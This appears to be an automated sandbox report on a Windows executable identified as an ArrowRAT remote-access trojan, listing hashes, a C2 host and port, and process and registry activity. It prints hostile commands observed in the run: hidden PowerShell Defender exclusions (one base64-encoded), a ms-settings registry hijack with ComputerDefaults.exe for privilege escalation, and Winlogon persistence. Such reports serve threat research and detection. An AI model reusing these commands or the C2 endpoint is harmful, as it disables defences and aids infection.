Analysis
-
max time kernel
141s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
31-07-2023 01:51
Static task
static1
Behavioral task
behavioral1
Sample
2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe
Resource
win10v2004-20230703-en
General
-
Target
2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe
-
Size
2.4MB
-
MD5
6eb284564aa7bd24f4f6df02ef05d185
-
SHA1
47f85ddc0b1a090d1852c37b2e2e1449e5b6db88
-
SHA256
2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb
-
SHA512
49e1a9584c74f32f9566d3c4ca31684c474ec260e50bd07b8d3c0a8ef3f3e70d10773952e5d219aa8c9076b86cddcefd242dfb91b507feeb06c5d69ba9e91179
-
SSDEEP
49152:Wm7ZuvKRXc8DJ2c2Xp95LBO1PJNNNQzgj7k/8E54IlDXRRtdQNH:D77P2XPOxJ9FcEq4IZXRRC
Malware Config
Extracted
arrowrat
Client
line-ellis.gl.at.ply.gg:10735
nAChhjAnR
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" Client.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 2 IoCs
pid Process 2920 Client.exe 1652 SteamSetup.exe -
Loads dropped DLL 2 IoCs
pid Process 1652 SteamSetup.exe 1652 SteamSetup.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Client.exe 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\ms-settings Client.exe Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\ms-settings\shell\open Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" Client.exe Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\ms-settings\shell\open\command Client.exe Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\ms-settings\shell Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute Client.exe Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 2920 Client.exe 2920 Client.exe 2344 powershell.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe 2920 Client.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2920 Client.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe Token: SeShutdownPrivilege 2524 explorer.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe 2524 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2920 Client.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2344 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 28 PID 2792 wrote to memory of 2344 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 28 PID 2792 wrote to memory of 2344 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 28 PID 2792 wrote to memory of 2920 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 30 PID 2792 wrote to memory of 2920 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 30 PID 2792 wrote to memory of 2920 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 30 PID 2792 wrote to memory of 1652 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 31 PID 2792 wrote to memory of 1652 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 31 PID 2792 wrote to memory of 1652 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 31 PID 2792 wrote to memory of 1652 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 31 PID 2792 wrote to memory of 1652 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 31 PID 2792 wrote to memory of 1652 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 31 PID 2792 wrote to memory of 1652 2792 2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe 31 PID 2920 wrote to memory of 2524 2920 Client.exe 32 PID 2920 wrote to memory of 2524 2920 Client.exe 32 PID 2920 wrote to memory of 2524 2920 Client.exe 32 PID 2524 wrote to memory of 2780 2524 explorer.exe 44 PID 2524 wrote to memory of 2780 2524 explorer.exe 44 PID 2524 wrote to memory of 2780 2524 explorer.exe 44 PID 2920 wrote to memory of 2820 2920 Client.exe 33 PID 2920 wrote to memory of 2820 2920 Client.exe 33 PID 2920 wrote to memory of 2820 2920 Client.exe 33 PID 2920 wrote to memory of 2820 2920 Client.exe 33 PID 2920 wrote to memory of 2484 2920 Client.exe 34 PID 2920 wrote to memory of 2484 2920 Client.exe 34 PID 2920 wrote to memory of 2484 2920 Client.exe 34 PID 2920 wrote to memory of 2484 2920 Client.exe 34 PID 2920 wrote to memory of 2756 2920 Client.exe 43 PID 2920 wrote to memory of 2756 2920 Client.exe 43 PID 2920 wrote to memory of 2756 2920 Client.exe 43 PID 2920 wrote to memory of 2756 2920 Client.exe 43 PID 2920 wrote to memory of 268 2920 Client.exe 42 PID 2920 wrote to memory of 268 2920 Client.exe 42 PID 2920 wrote to memory of 268 2920 Client.exe 42 PID 2920 wrote to memory of 268 2920 Client.exe 42 PID 2920 wrote to memory of 472 2920 Client.exe 41 PID 2920 wrote to memory of 472 2920 Client.exe 41 PID 2920 wrote to memory of 472 2920 Client.exe 41 PID 2920 wrote to memory of 472 2920 Client.exe 41 PID 2920 wrote to memory of 956 2920 Client.exe 40 PID 2920 wrote to memory of 956 2920 Client.exe 40 PID 2920 wrote to memory of 956 2920 Client.exe 40 PID 2920 wrote to memory of 956 2920 Client.exe 40 PID 2920 wrote to memory of 1320 2920 Client.exe 38 PID 2920 wrote to memory of 1320 2920 Client.exe 38 PID 2920 wrote to memory of 1320 2920 Client.exe 38 PID 2920 wrote to memory of 1320 2920 Client.exe 38 PID 2920 wrote to memory of 1108 2920 Client.exe 37 PID 2920 wrote to memory of 1108 2920 Client.exe 37 PID 2920 wrote to memory of 1108 2920 Client.exe 37 PID 2920 wrote to memory of 1108 2920 Client.exe 37 PID 2920 wrote to memory of 1484 2920 Client.exe 36 PID 2920 wrote to memory of 1484 2920 Client.exe 36 PID 2920 wrote to memory of 1484 2920 Client.exe 36 PID 2920 wrote to memory of 1484 2920 Client.exe 36 PID 2920 wrote to memory of 572 2920 Client.exe 35 PID 2920 wrote to memory of 572 2920 Client.exe 35 PID 2920 wrote to memory of 572 2920 Client.exe 35 PID 2920 wrote to memory of 572 2920 Client.exe 35 PID 2920 wrote to memory of 1884 2920 Client.exe 39 PID 2920 wrote to memory of 1884 2920 Client.exe 39 PID 2920 wrote to memory of 1884 2920 Client.exe 39 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe"C:\Users\Admin\AppData\Local\Temp\2be002d8f440059579b6eec67e37a1272081daad1dc8e3f3800adf94620c7beb.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbQBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\Client.exe"C:\Windows\Client.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:2780
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:2820
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:2484
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:572
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:1484
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:1108
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:1320
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"3⤵PID:1884
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:472
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:268
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR3⤵PID:2756
-
-
-
C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"C:\Users\Admin\AppData\Local\Temp\SteamSetup.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1652
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD570f3bc193dfa56b78f3e6e4f800f701f
SHA11e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA2563b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA5123ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1
-
Filesize
2.2MB
MD570f3bc193dfa56b78f3e6e4f800f701f
SHA11e5598f2de49fed2e81f3dd8630c7346a2b89487
SHA2563b616cb0beaacffb53884b5ba0453312d2577db598d2a877a3b251125fb281a1
SHA5123ffa815fea2fe37c4fde71f70695697d2b21d6d86a53eea31a1bc1256b5777b44ff400954a0cd0653f1179e4b2e63e24e50b70204d2e9a4b8bf3abf8ede040d1
-
Filesize
158KB
MD5d7dea9816b882cb53d615a3afdf0c955
SHA1d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA25696d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35
-
Filesize
158KB
MD5d7dea9816b882cb53d615a3afdf0c955
SHA1d3bfd91ff74c072028bd747d4f56f17cc55168a5
SHA25696d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
SHA512b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35
-
Filesize
11KB
MD5a4dd044bcd94e9b3370ccf095b31f896
SHA117c78201323ab2095bc53184aa8267c9187d5173
SHA2562e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc
SHA51287335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a
-
Filesize
9KB
MD50d45588070cf728359055f776af16ec4
SHA1c4375ceb2883dee74632e81addbfa4e8b0c6d84a
SHA256067c77d51df034b4a614f83803140fbf4cd2f8684b88ea8c8acdf163edad085a
SHA512751ebf4c43f100b41f799d0fbf8db118ea8751df029c1f4c4b0daeb0fef200ddf2e41c1c9c55c2dc94f2c841cf6acb7df355e98a2e5877a7797f0f1d41a7e415